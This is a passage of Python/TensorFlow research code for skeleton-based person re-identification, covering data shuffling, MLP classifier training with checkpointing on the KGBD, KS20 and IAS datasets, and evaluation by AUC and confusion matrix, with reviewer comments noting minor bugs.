if C_reid == '1':
permutation = np.random.permutation(C_X.shape[0])
else:
permutation = np.random.permutation(X_0.shape[0])
permutation_flag = True
# useless C_X
if C_reid == '1':
C_X = C_X[permutation, ]
else:
X_0 = X_0[permutation, ]
if Model == 'rev_rec_plus':
X_1 = X_1[permutation,]
X_2 = X_2[permutation,]
y_0 = y_0[permutation, ]
if Model == 'rev_rec_plus':
y_1 = y_1[permutation,]
y_2 = y_2[permutation,]
# X_pred = X_pred[permutation, ]
if not permutation_test_flag:
if C_reid == '1':
test_permutation = np.random.permutation(t_C_X.shape[0])
else:
test_permutation = np.random.permutation(t_X_0.shape[0])
permutation_test_flag = True
if manner == 'sc':
if C_reid == '1':
t_C_X = t_C_X[test_permutation, ]
else:
t_X_0 = t_X_0[test_permutation,]
if Model == 'rev_rec_plus':
t_X_1 = t_X_1[test_permutation,]
t_X_2 = t_X_2[test_permutation,]
t_y_0 = t_y_0[test_permutation,]
if Model == 'rev_rec_plus':
t_y_1 = t_y_1[test_permutation,]
t_y_2 = t_y_2[test_permutation,]
# t_X_att = t_X_att[test_permutation]
if dataset == 'IAS':
# valid_2_source = t_2_X
# valid_2_target = t_2_y
if C_reid == '1':
t_2_C_X = np.array(t_2_C_X)
t_2_C_y = np.array(t_2_C_y)
else:
t_2_X_0 = np.array(t_2_X_0)
t_2_y_0 = np.array(t_2_y_0)
if Model == 'rev_rec_plus':
t_2_X_1 = np.array(t_2_X_1)
t_2_y_1 = np.array(t_2_y_1)
t_2_X_2 = np.array(t_2_X_2)
t_2_y_2 = np.array(t_2_y_2)
if not permutation_test_2_flag:
if C_reid == '1':
test_2_permutation = np.random.permutation(t_2_C_X.shape[0])
else:
test_2_permutation = np.random.permutation(t_2_X_0.shape[0])
permutation_test_2_flag = True
if manner == 'sc':
if C_reid == '1':
t_2_C_X = t_2_C_X[test_2_permutation,]
else:
t_2_X_0 = t_2_X_0[test_2_permutation,]
if Model == 'rev_rec_plus':
t_2_X_1 = t_2_X_1[test_2_permutation,]
t_2_X_2 = t_2_X_2[test_2_permutation,]
t_2_y_0 = t_2_y_0[test_2_permutation,]
if Model == 'rev_rec_plus':
t_2_y_1 = t_2_y_1[test_2_permutation,]
t_2_y_2 = t_2_y_2[test_2_permutation,]
# print(X_0.shape, t_X_0.shape)
# exit(0)
if Model == 'rev_rec_plus':
X = np.concatenate((X_0, X_1, X_2), axis=1)
t_X = np.concatenate((t_X_0, t_X_1, t_X_2), axis=1)
else:
X = X_0
t_X = t_X_0
y = y_0
t_y = t_y_0
if dataset == 'IAS':
if Model == 'rev_rec_plus':
t_2_X = np.concatenate((t_2_X_0, t_2_X_1, t_2_X_2), axis=1)
else:
t_2_X = t_2_X_0
t_2_y = t_2_y_0
if C_reid == '1':
return C_X, y, t_C_X, t_y, t_2_C_X, t_2_y, t_X_att
else:
return X, y, t_X, t_y, t_2_X, t_2_y, t_X_att
else:
if C_reid == '1':
return C_X, y, t_C_X, t_y, t_X_att
else:
return X, y, t_X, t_y, t_X_att
def get_new_train_batches(targets, sources, batch_size):
    """Yield (targets_batch, sources_batch) mini-batches.

    If there are fewer samples than one batch, the whole dataset is
    yielded once; otherwise only full batches are produced (any
    trailing remainder smaller than batch_size is dropped).
    """
    if len(targets) < batch_size:
        yield targets, sources
        return
    n_full_batches = len(sources) // batch_size
    for idx in range(n_full_batches):
        lo = idx * batch_size
        hi = lo + batch_size
        yield targets[lo:hi], sources[lo:hi]
def encoder_classify_union_directly(X, y, t_X, t_y, new_dir, ps, dataset):
    """Train and validate a one-hidden-layer MLP re-ID classifier on
    pre-extracted encoder features.

    Args:
        X, y: training features and integer identity labels.
        t_X, t_y: test/validation features and labels.
        new_dir: directory where checkpoints / npy dumps are written.
        ps: run tag; used as a sub-directory name and result-file name.
        dataset: dataset name ('KGBD', 'KS20', 'IAS', ...); selects the
            epoch budget and the id-dictionary files to load.

    Returns:
        1 on completion.

    Relies on module-level globals: epochs, attention, manner, view,
    frames_ps, time_steps, Model, rnn_size, batch_size, learning_rate,
    config, tf, np, os.
    """
    global epochs, attention, manner, view
    # Per-dataset epoch budget.
    epochs = 300
    if dataset == 'KGBD':
        epochs = 200
    if dataset == 'KS20':
        epochs = 800
    try:
        os.mkdir(new_dir)
    except:
        pass
    if view != '':
        view_dir = view + '/'
    else:
        view_dir = ''
    from sklearn.preprocessing import label_binarize
    if dataset == 'IAS':
        dataset = 'IAS'
    # Load the id dictionaries saved during preprocessing and one-hot
    # encode labels against the sorted id lists.
    ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
    ids = ids.item()
    t_ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
    t_ids = t_ids.item()
    ids_keys = sorted(list(ids.keys()))
    classes = [i for i in ids_keys]
    y = label_binarize(y, classes=classes)
    t_ids_keys = sorted(list(t_ids.keys()))
    classes = [i for i in t_ids_keys]
    t_y = label_binarize(t_y, classes=classes)
    train_source = X
    train_target = y
    valid_source = t_X
    valid_target = t_y
    # Input width depends on the model variant ('rev_rec_plus'
    # concatenates 3 feature groups) and on 'manner' ('sc' keeps all
    # time steps per sample).
    if Model == 'rev_rec_plus':
        if manner == 'sc':
            first_size = rnn_size * time_steps * 3 * 3
        else:
            first_size = rnn_size * 3 * 3
        X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
        y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
        lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
        W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
        b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
        Wx_plus_b1 = tf.matmul(X_input, W1) + b1
        l1 = tf.nn.relu(Wx_plus_b1)
        W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
        # NOTE(review): name='b' is passed to tf.zeros, not tf.Variable —
        # presumably intended for the Variable; confirm before relying on
        # the variable name.
        b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
        pred = tf.matmul(l1, W) + b
    else:
        if manner == 'sc':
            first_size = rnn_size * time_steps * 3
        else:
            first_size = rnn_size * 3
        X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
        y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
        lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
        W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
        b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
        Wx_plus_b1 = tf.matmul(X_input, W1) + b1
        l1 = tf.nn.relu(Wx_plus_b1)
        W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
        b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
        pred = tf.matmul(l1, W) + b
    with tf.name_scope("new_train"):
        optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam3")
        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
        gradients = optimizer.compute_gradients(cost)
        # NOTE(review): capped_gradients is computed but never applied —
        # train_op minimizes the raw cost, so gradient clipping has no
        # effect here. Confirm whether apply_gradients(capped_gradients)
        # was intended.
        capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
        train_op = optimizer.minimize(cost)
    correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
    def get_new_train_batches(targets, sources, batch_size):
        # Local batcher: yields only full batches (remainder dropped);
        # shadows the module-level helper of the same name.
        for batch_i in range(0, len(sources) // batch_size):
            start_i = batch_i * batch_size
            sources_batch = sources[start_i:start_i + batch_size]
            targets_batch = targets[start_i:start_i + batch_size]
            yield targets_batch, sources_batch
    init = tf.global_variables_initializer()
    with tf.Session(config=config) as sess:
        sess.run(init)
        step = 0
        train_loss = []
        test_loss = []
        accs = []
        val_accs = [0]
        max_acc = 0
        saver = tf.train.Saver()
        try:
            os.mkdir(new_dir)
        except:
            pass
        new_dir += '/' + ps
        try:
            os.mkdir(new_dir)
        except:
            pass
        # if attention == 'BA':
        #     manner == 'sc'
        for epoch_i in range(1, epochs + 1):
            for batch_i, (y_batch, X_batch) in enumerate(
                    get_new_train_batches(train_target, train_source, batch_size)):
                _, loss, acc = sess.run([train_op, cost, accuracy],
                                        {X_input: X_batch,
                                         y_input: y_batch,
                                         lr: learning_rate})
                accs.append(acc)
                # Evaluate on the validation set every iteration
                # (epoch_i % 1 is always 0).
                if epoch_i % 1 == 0:
                    loss, train_acc = sess.run([cost, accuracy],
                                               {X_input: X_batch,
                                                y_input: y_batch,
                                                lr: learning_rate})
                    val_loss = []
                    val_acc = []
                    flag = 0
                    # Pad the validation set up to one full batch by
                    # repeating the first sample.
                    if valid_source.shape[0] < batch_size:
                        flag = batch_size - valid_source.shape[0]
                        valid_source = valid_source.tolist()
                        valid_target = valid_target.tolist()
                        valid_source.extend([valid_source[0]] * flag)
                        valid_target.extend([valid_target[0]] * flag)
                        valid_source = np.array(valid_source)
                        valid_target = np.array(valid_target)
                    if manner == 'ap':
                        all_frame_preds = []
                    for k in range(valid_source.shape[0] // batch_size):
                        if manner == 'sc':
                            val_loss_t, val_acc_t = sess.run(
                                [cost, accuracy],
                                {X_input: valid_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            val_loss.append(val_loss_t)
                            val_acc.append(val_acc_t)
                        else:
                            # 'ap': also collect raw per-frame logits so
                            # sequence-level predictions can be averaged below.
                            val_loss_t, val_acc_t, frame_preds = sess.run(
                                [cost, accuracy, pred],
                                {X_input: valid_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            # pred_prob = frame_preds / np.tile(np.sum(frame_preds, axis=1), [frame_preds.shape[1], 1]).T
                            # pred_prob = np.sum(frame_preds, axis=0)
                            # all_frame_preds.extend(pred_prob)
                            all_frame_preds.extend(frame_preds)
                            val_loss.append(val_loss_t)
                            val_acc.append(val_acc_t)
                    if manner == 'ap':
                        # Sequence-level accuracy: average the frame logits
                        # of each time_steps-long window whose labels agree.
                        sequence_pred_correct = 0
                        sequence_num = 0
                        for k in range(len(all_frame_preds) // time_steps):
                            sequence_labels = np.argmax(valid_target[k * time_steps: (k + 1) * time_steps], axis=1)
                            if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
                                frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
                                sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
                                if sequence_pred == sequence_labels[0]:
                                    # print(sequence_pred)
                                    sequence_pred_correct += 1
                                sequence_num += 1
                        seq_acc_t = sequence_pred_correct / sequence_num
                    # val_acc.append(val_acc_t)
                    # Checkpoint whenever validation accuracy ties or beats
                    # the best seen so far.
                    if manner == 'sc':
                        if sum(val_acc) / len(val_acc) >= max(val_accs):
                            saver.save(sess, new_dir + "/trained_model.ckpt")
                        val_accs.append(sum(val_acc) / len(val_acc))
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - Train_Acc: {:>6.3f} - Val_Acc {:>6.3f} {:>6.3f} (max)'
                                .format(epoch_i,
                                        epochs,
                                        batch_i,
                                        len(train_target) // batch_size,
                                        loss,
                                        train_acc,
                                        sum(val_acc) / len(val_acc),
                                        max(val_accs)
                                        ))
                    else:
                        if seq_acc_t >= max(val_accs):
                            saver.save(sess, new_dir + "/trained_model.ckpt")
                            # np.save(new_dir + '/val_X.npy', valid_source)
                            # np.save(new_dir + '/val_y.npy', valid_target)
                        # if epoch_i % 30 == 0:
                        #     evaluate_reid('CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner)
                        val_accs.append(seq_acc_t)
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - Train_Acc: {:>6.3f} - Val_Acc {:>6.3f} {:>6.3f} (max)'
                                .format(epoch_i,
                                        epochs,
                                        batch_i,
                                        len(train_target) // batch_size,
                                        loss,
                                        train_acc,
                                        seq_acc_t,
                                        max(val_accs)
                                        ))
                    train_loss.append(loss)
                    test_loss.append(sum(val_loss) / len(val_loss))
                step += 1
        # Persist the data splits and the training curves for later
        # inspection / evaluate_reid().
        # saver.save(sess, new_dir + "/trained_model.ckpt")
        np.save(new_dir + '/train_X.npy', train_source)
        np.save(new_dir + '/train_y.npy', train_target)
        np.save(new_dir + '/val_X.npy', valid_source)
        np.save(new_dir + '/val_y.npy', valid_target)
        print('Model Trained and Saved')
        np.save(new_dir + '/train_loss.npy', np.array(train_loss))
        np.save(new_dir + '/test_loss.npy', np.array(test_loss))
        np.save(new_dir + '/acc.npy', np.array(accs))
        disc_str = ''
        # NOTE(review): np.max(acc) uses the last batch accuracy (a
        # scalar), not the accs history — presumably np.max(accs) was
        # intended; confirm.
        disc_str += str(train_loss[-1]) + '-' + str(np.min(train_loss)) + ' ' + str(test_loss[-1]) + '-' + str(
            np.min(test_loss)) + ' ' \
                    + str(np.max(acc))
        f = open(ps + '.txt', 'w')
        f.write(disc_str)
        f.close()
        return 1
def encoder_classify_union_directly_IAS(X, y, t_X, t_y, t_2_X, t_2_y, new_dir, ps, dataset):
    """IAS-specific variant of encoder_classify_union_directly: trains one
    MLP classifier and validates it on the two IAS test splits (IAS-A and
    IAS-B), keeping separate best checkpoints per split.

    Args:
        X, y: training features / labels.
        t_X, t_y: IAS-A validation features / labels.
        t_2_X, t_2_y: IAS-B validation features / labels.
        new_dir, ps, dataset: output directory, run tag, dataset name.

    Returns:
        1 on completion.

    Uses the same module-level globals as the non-IAS variant.
    """
    print(t_X.shape, t_y.shape)
    global epochs, attention, manner
    epochs = 300
    try:
        os.mkdir(new_dir)
    except:
        pass
    from sklearn.preprocessing import label_binarize
    # One-hot encode train / IAS-A / IAS-B labels against their own
    # sorted id dictionaries.
    ids = np.load('Datasets/' + frames_ps + dataset + '_train_npy_data/ids_' + dataset + '_' + str(time_steps) + '.npy')
    ids = ids.item()
    t_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-A_' + str(time_steps) + '.npy')
    t_ids = t_ids.item()
    t_2_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-B_' + str(time_steps) + '.npy')
    t_2_ids = t_2_ids.item()
    ids_keys = sorted(list(ids.keys()))
    classes = [i for i in ids_keys]
    y = label_binarize(y, classes=classes)
    t_ids_keys = sorted(list(t_ids.keys()))
    classes = [i for i in t_ids_keys]
    t_y = label_binarize(t_y, classes=classes)
    t_2_ids_keys = sorted(list(t_2_ids.keys()))
    classes = [i for i in t_2_ids_keys]
    t_2_y = label_binarize(t_2_y, classes=classes)
    train_source = X
    train_target = y
    valid_source = t_X
    valid_target = t_y
    valid_2_source = t_2_X
    valid_2_target = t_2_y
    # One-hidden-layer MLP; input width depends on model variant and
    # 'manner' (see non-IAS variant).
    if Model == 'rev_rec_plus':
        if manner == 'sc':
            first_size = rnn_size * time_steps * 3 * 3
        else:
            first_size = rnn_size * 3 * 3
        X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
        y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
        lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
        W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
        b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
        Wx_plus_b1 = tf.matmul(X_input, W1) + b1
        l1 = tf.nn.relu(Wx_plus_b1)
        W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
        # NOTE(review): name='b' is passed to tf.zeros, not tf.Variable.
        b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
        pred = tf.matmul(l1, W) + b
    else:
        if manner == 'sc':
            first_size = rnn_size * time_steps * 3
        else:
            first_size = rnn_size * 3
        X_input = tf.placeholder(tf.float32, [None, first_size], name='X_input')
        y_input = tf.placeholder(tf.int32, [None, len(classes)], name='y_input')
        lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
        W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
        b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
        Wx_plus_b1 = tf.matmul(X_input, W1) + b1
        l1 = tf.nn.relu(Wx_plus_b1)
        W = tf.Variable(tf.random_normal([rnn_size, len(classes)]), name='W')
        b = tf.Variable(tf.zeros(shape=[len(classes), ], name='b'))
        pred = tf.matmul(l1, W) + b
    with tf.name_scope("new_train"):
        optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam3")
        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
        gradients = optimizer.compute_gradients(cost)
        # NOTE(review): capped_gradients is never applied; train_op
        # minimizes the raw cost (same as the non-IAS variant).
        capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
        train_op = optimizer.minimize(cost)
    correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
    def get_new_train_batches(targets, sources, batch_size):
        # Local batcher: full batches only; shadows the module-level helper.
        for batch_i in range(0, len(sources) // batch_size):
            start_i = batch_i * batch_size
            sources_batch = sources[start_i:start_i + batch_size]
            targets_batch = targets[start_i:start_i + batch_size]
            yield targets_batch, sources_batch
    init = tf.global_variables_initializer()
    with tf.Session(config=config) as sess:
        sess.run(init)
        step = 0
        train_loss = []
        test_loss = []
        test_2_loss = []
        accs = []
        val_accs = [0]
        val_2_accs = [0]
        saver = tf.train.Saver()
        max_accs = [0, 0]
        new_dir += '/' + ps
        try:
            os.mkdir(new_dir)
        except:
            pass
        # if attention == 'BA':
        #     manner == 'sc'
        for epoch_i in range(1, epochs + 1):
            for batch_i, (y_batch, X_batch) in enumerate(
                    get_new_train_batches(train_target, train_source, batch_size)):
                _, loss, acc = sess.run([train_op, cost, accuracy],
                                        {X_input: X_batch,
                                         y_input: y_batch,
                                         lr: learning_rate})
                accs.append(acc)
                # Evaluate on both splits every iteration.
                if epoch_i % 1 == 0:
                    loss, train_acc = sess.run([cost, accuracy],
                                               {X_input: X_batch,
                                                y_input: y_batch,
                                                lr: learning_rate})
                    val_loss = []
                    val_acc = []
                    val_2_loss = []
                    val_2_acc = []
                    flag = 0
                    # Pad each validation split up to one full batch by
                    # repeating its first sample.
                    if valid_source.shape[0] < batch_size:
                        flag = batch_size - valid_source.shape[0]
                        valid_source = valid_source.tolist()
                        valid_target = valid_target.tolist()
                        valid_source.extend([valid_source[0]] * flag)
                        valid_target.extend([valid_target[0]] * flag)
                        valid_source = np.array(valid_source)
                        valid_target = np.array(valid_target)
                    if valid_2_source.shape[0] < batch_size:
                        flag = batch_size - valid_2_source.shape[0]
                        valid_2_source = valid_2_source.tolist()
                        valid_2_target = valid_2_target.tolist()
                        valid_2_source.extend([valid_2_source[0]] * flag)
                        valid_2_target.extend([valid_2_target[0]] * flag)
                        valid_2_source = np.array(valid_2_source)
                        valid_2_target = np.array(valid_2_target)
                    if manner == 'ap':
                        all_frame_preds = []
                        all_2_frame_preds = []
                    # IAS-A evaluation.
                    for k in range(valid_source.shape[0] // batch_size):
                        if manner == 'sc':
                            val_loss_t, val_acc_t = sess.run(
                                [cost, accuracy],
                                {X_input: valid_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            val_loss.append(val_loss_t)
                            val_acc.append(val_acc_t)
                        else:
                            val_loss_t, val_acc_t, frame_preds = sess.run(
                                [cost, accuracy, pred],
                                {X_input: valid_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            all_frame_preds.extend(frame_preds)
                            val_loss.append(val_loss_t)
                            val_acc.append(val_acc_t)
                    # IAS-B evaluation.
                    for k in range(valid_2_source.shape[0] // batch_size):
                        if manner == 'sc':
                            val_2_loss_t, val_2_acc_t = sess.run(
                                [cost, accuracy],
                                {X_input: valid_2_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_2_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            val_2_loss.append(val_2_loss_t)
                            val_2_acc.append(val_2_acc_t)
                        else:
                            val_2_loss_t, val_2_acc_t, frame_2_preds = sess.run(
                                [cost, accuracy, pred],
                                {X_input: valid_2_source[k * batch_size: (k + 1) * batch_size],
                                 y_input: valid_2_target[k * batch_size: (k + 1) * batch_size],
                                 lr: learning_rate})
                            all_2_frame_preds.extend(frame_2_preds)
                            val_2_loss.append(val_2_loss_t)
                            val_2_acc.append(val_2_acc_t)
                    if manner == 'ap':
                        # Sequence-level accuracy on each split: average the
                        # frame logits of each time_steps window whose
                        # labels agree.
                        sequence_pred_correct = 0
                        sequence_num = 0
                        sequence_2_pred_correct = 0
                        sequence_2_num = 0
                        for k in range(len(all_frame_preds) // time_steps):
                            sequence_labels = np.argmax(valid_target[k * time_steps: (k + 1) * time_steps], axis=1)
                            if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
                                frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
                                sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
                                if sequence_pred == sequence_labels[0]:
                                    # print(sequence_pred)
                                    sequence_pred_correct += 1
                                sequence_num += 1
                        seq_acc_t = sequence_pred_correct / sequence_num
                        for k in range(len(all_2_frame_preds) // time_steps):
                            sequence_2_labels = np.argmax(valid_2_target[k * time_steps: (k + 1) * time_steps], axis=1)
                            if (sequence_2_labels == np.tile(sequence_2_labels[0], [sequence_2_labels.shape[0]])).all():
                                frame_2_predictions = np.array(all_2_frame_preds[k * time_steps: (k + 1) * time_steps])
                                sequence_2_pred = np.argmax(np.average(frame_2_predictions, axis=0))
                                if sequence_2_pred == sequence_2_labels[0]:
                                    # print(sequence_pred)
                                    sequence_2_pred_correct += 1
                                sequence_2_num += 1
                        seq_2_acc_t = sequence_2_pred_correct / sequence_2_num
                    # val_acc.append(val_acc_t)
                    if manner == 'sc':
                        # Save one shared checkpoint if either split improves.
                        if sum(val_acc) / len(val_acc) >= max(val_accs) or sum(val_2_acc) / len(val_2_acc) >= max(val_2_accs):
                            saver.save(sess, new_dir + "/trained_model.ckpt")
                            np.save(new_dir + '/val_X.npy', valid_source)
                            np.save(new_dir + '/val_y.npy', valid_target)
                        val_accs.append(sum(val_acc) / len(val_acc))
                        val_2_accs.append(sum(val_2_acc)/len(val_2_acc))
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - V_Acc (IAS-A): {:>6.3f} {:>6.3f} (max) - V_Acc (IAS-B) {:>6.3f} {:>6.3f} (max)'
                                .format(epoch_i,
                                        epochs,
                                        batch_i,
                                        len(train_target) // batch_size,
                                        loss,
                                        sum(val_acc) / len(val_acc),
                                        max(val_accs),
                                        sum(val_2_acc) / len(val_2_acc),
                                        max(val_2_accs)
                                        ))
                    else:
                        # Keep per-split best checkpoints, plus a combined
                        # one when the summed accuracy improves.
                        # if seq_acc_t > 0.5 and seq_2_acc_t > 0.5:
                        pre_1 = max(val_accs)
                        pre_2 = max(val_2_accs)
                        if seq_acc_t > pre_1:
                            saver.save(sess, new_dir + "/A_trained_model.ckpt")
                        if seq_2_acc_t > pre_2:
                            saver.save(sess, new_dir + "/B_trained_model.ckpt")
                        # print(max(pre_1, seq_acc_t), max(seq_2_acc_t, pre_2))
                        if (seq_acc_t > pre_1 and seq_acc_t + seq_2_acc_t > pre_1 + pre_2) \
                                or (seq_2_acc_t > pre_2 and seq_acc_t + seq_2_acc_t > pre_1 + pre_2):
                            max_accs[0] = seq_acc_t
                            max_accs[1] = seq_2_acc_t
                            saver.save(sess, new_dir + "/trained_model.ckpt")
                        # np.save(new_dir + '/val_X.npy', valid_source)
                        # np.save(new_dir + '/val_y.npy', valid_target)
                        val_accs.append(seq_acc_t)
                        val_2_accs.append(seq_2_acc_t)
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Train Loss: {:>6.3f} - V_Acc (IAS-A): {:>6.3f} {:>6.3f} (max) - V_Acc (IAS-B) {:>6.3f} {:>6.3f} (max)'
                                .format(epoch_i,
                                        epochs,
                                        batch_i,
                                        len(train_target) // batch_size,
                                        loss,
                                        seq_acc_t,
                                        max(pre_1, seq_acc_t),
                                        seq_2_acc_t,
                                        max(seq_2_acc_t, pre_2)
                                        ))
                    train_loss.append(loss)
                    test_loss.append(sum(val_loss) / len(val_loss))
                    test_2_loss.append(sum(val_2_loss) / len(val_2_loss))
                step += 1
        saver = tf.train.Saver()
        # new_dir += '/' + ps
        # try:
        #     os.mkdir(new_dir)
        # except:
        #     pass
        # saver.save(sess, new_dir + "/trained_model.ckpt")
        # Persist the splits and training curves.
        np.save(new_dir + '/train_X.npy', train_source)
        np.save(new_dir + '/train_y.npy', train_target)
        # np.save(new_dir + '/train_preds', train_preds)
        np.save(new_dir + '/val_X.npy', valid_source)
        np.save(new_dir + '/val_y.npy', valid_target)
        np.save(new_dir + '/val_2_X.npy', valid_2_source)
        np.save(new_dir + '/val_2_y.npy', valid_2_target)
        # np.save(new_dir + 'val_preds.npy', valid_preds)
        print('Model Trained and Saved')
        np.save(new_dir + '/train_loss.npy', np.array(train_loss))
        np.save(new_dir + '/test_A_loss.npy', np.array(test_loss))
        # NOTE(review): test_B_loss is saved from test_loss, not
        # test_2_loss — presumably a copy-paste slip; confirm.
        np.save(new_dir + '/test_B_loss.npy', np.array(test_loss))
        np.save(new_dir + '/acc.npy', np.array(accs))
        disc_str = ''
        # NOTE(review): np.max(acc) uses the last batch accuracy scalar,
        # not the accs history — presumably np.max(accs) was intended.
        disc_str += str(train_loss[-1]) + '-' + str(np.min(train_loss)) + ' ' + str(test_loss[-1]) + '-' + str(
            np.min(test_loss)) + ' ' \
                    + str(np.max(acc))
        f = open(ps + '.txt', 'w')
        f.write(disc_str)
        f.close()
        return 1
def evaluate_reid(model_dir):
    """Evaluate a trained re-ID classifier checkpoint.

    Loads the validation arrays and the checkpoint saved under
    model_dir, then reports Rank-n accuracy, Rank-1 accuracy, nAUC and a
    confusion matrix. For IAS, evaluates IAS-A (A_trained_model.ckpt)
    and then IAS-B (B_trained_model.ckpt).

    Args:
        model_dir: directory containing val_X.npy / val_y.npy (and
            val_2_*.npy for IAS) plus the checkpoint files.

    Relies on module-level globals: batch_size, dataset, manner,
    time_steps, learning_rate, config, get_new_train_batches, tf, np.
    """
    # print('Print the Validation Loss and Rank-1 Accuracy for each testing bacth: ')
    global batch_size, dataset, manner
    X = np.load(model_dir + '/val_X.npy')
    y = np.load(model_dir + '/val_y.npy')
    print(X.shape, y.shape)
    if dataset == 'IAS':
        X_2 = np.load(model_dir + '/val_2_X.npy')
        y_2 = np.load(model_dir + '/val_2_y.npy')
    # Hard-coded identity counts per dataset.
    if dataset == 'BIWI':
        classes = [i for i in range(28)]
    elif dataset == 'KGBD':
        classes = [i for i in range(164)]
    elif dataset == 'IAS':
        classes = [i for i in range(11)]
    elif dataset == 'KinectReID':
        classes = [i for i in range(71)]
    elif dataset == 'KS20':
        classes = [i for i in range(20)]
    checkpoint = model_dir + "/trained_model.ckpt"
    if dataset == 'IAS':
        checkpoint = model_dir + "/A_trained_model.ckpt"
    loaded_graph = tf.get_default_graph()
    from sklearn.preprocessing import label_binarize
    from sklearn.metrics import roc_curve, auc, confusion_matrix
    nAUC = 0
    def cal_AUC(score_y, pred_y, ps, draw_pic=False):
        # Micro-averaged AUC over flattened score/label matrices; also
        # prints the confusion matrix of the argmax predictions.
        score_y = np.array(score_y)
        pred_y = label_binarize(np.array(pred_y), classes=classes)
        # Compute micro-average ROC curve and ROC area
        fpr, tpr, thresholds = roc_curve(pred_y.ravel(), score_y.ravel())
        roc_auc = auc(fpr, tpr)
        y_true = np.argmax(pred_y, axis=-1)
        y_pred = np.argmax(score_y, axis=-1)
        print('\n### Re-ID Confusion Matrix: ')
        print(confusion_matrix(y_true, y_pred))
        return roc_auc
        # NOTE(review): everything below is unreachable — the return
        # above exits before the plotting code; draw_pic has no effect.
        if draw_pic:
            fig = plt.figure()
            lw = 2
            plt.plot(fpr, tpr, color='darkorange',
                     lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
            plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
            plt.xlim([0.0, 1.0])
            plt.ylim([0.0, 1.05])
            plt.xlabel('False Positive Rate')
            plt.ylabel('True Positive Rate')
            plt.title('Receiver operating characteristic: ' + ps)
            plt.legend(loc="lower right")
            fig.savefig('30 epoch ROC')
            plt.close()
    with tf.Session(graph=loaded_graph, config=config) as sess:
        loader = tf.train.import_meta_graph(checkpoint + '.meta')
        loader.restore(sess, checkpoint)
        X_input = loaded_graph.get_tensor_by_name('X_input:0')
        y_input = loaded_graph.get_tensor_by_name('y_input:0')
        lr = loaded_graph.get_tensor_by_name('learning_rate:0')
        # NOTE(review): 'add_1:0' relies on TF's default auto-naming of
        # the second add op (the logits matmul + b) — fragile if the
        # graph construction order changes; confirm against the trainer.
        pred = loaded_graph.get_tensor_by_name('add_1:0')
        cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
        accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
        correct_num = 0
